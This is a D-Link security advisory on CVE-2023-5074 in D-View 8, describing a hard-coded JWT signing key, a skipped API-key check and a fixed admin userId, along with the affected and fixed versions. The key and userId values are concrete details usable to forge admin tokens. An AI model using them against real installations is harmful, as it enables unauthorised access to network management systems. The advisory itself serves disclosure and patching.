• Home Support Forums Security Advisories Shop     English | French
Support Announcement
(Non-US) D-View 8 : v2.0.1.28 and below : CVE-2023-5074 : Hard-coded JWT Key Authentication Bypass (Also See 2nd Reference)

 

Overview

 

 

On June 23, 2022,   3rd party security research from Tenable reported the D-Link D-View 8.0 v2.0.1.28 having a Hard-coded JWT Key Authentication Bypass.

 

This was a known issue reported here: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10332  in v2.0.1.27 by ZDI and under development for Q4'2023.

 

 D-View 8 v2.0.1.89 was released on August 23, 2023 which mitigated the issue.

 

D-Link takes the issues of network security and user privacy very seriously. We have a dedicated task force and product management team on call to address evolving security issues and implement appropriate security measures.

  

 

Report information  

 

 

         - Reported by Tenable Research

 

                 - D-View Use of Hard-coded Cryptographic Key Authentication Bypass Vulnerability

 

         - Details

                      Link: CVE-2023-5074 :: Tenable : Link

 

 

                   D-View 8 uses a static key (D-Link) to protect the JWT token used in user authentication:

 

                   D-View 8 supports login with an API key, but the supplied API key in the JWT token (accessToken) is

                   not checked if there is no API key configured for the login user:


                   Upon D-View 8 installation, there is no API key configured for the default user 'admin'. In addition, the userId for the admin

                   user appears to remain the same (59171d56-e6b4-4789-90ff-a7a27fd48548) across installations. With a known JWT secret

                   key, an unauthenticated remote attacker can craft a valid JWT token and use the token to access protected APIs.


 

Affected Models

 

 

Model Software Version
  Region Fixed Release
 Recommendation  Last Updated
D-View 8
 v2.0.1.27 and below
(Non-US) v2.0.1.89

You must update via the application, or

contact you regional technical support for license verification

Link: https://dview.dlink.com/

 09/22/2023

  

Regarding Security patch for your D-Link Devices
 
Firmware and software updates address the security vulnerabilities in affected D-Link devices. D-Link will update this continually and we strongly recommend all users to install the relevant updates.
 
Please note that this is a device beta software, beta firmware, or hot-fix release which is still undergoing final testing before its official release. The beta software, beta firmware, or hot-fix is provided on an “as is” and “as available” basis and the user assumes all risk and liability for use thereof. D-Link does not provide any warranties, whether express or implied, as to the suitability or usability of the beta firmware. D-Link will not be liable for any loss, whether such loss is direct, indirect, special or consequential, suffered by any party as a result of their use of the beta firmware.
 
As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.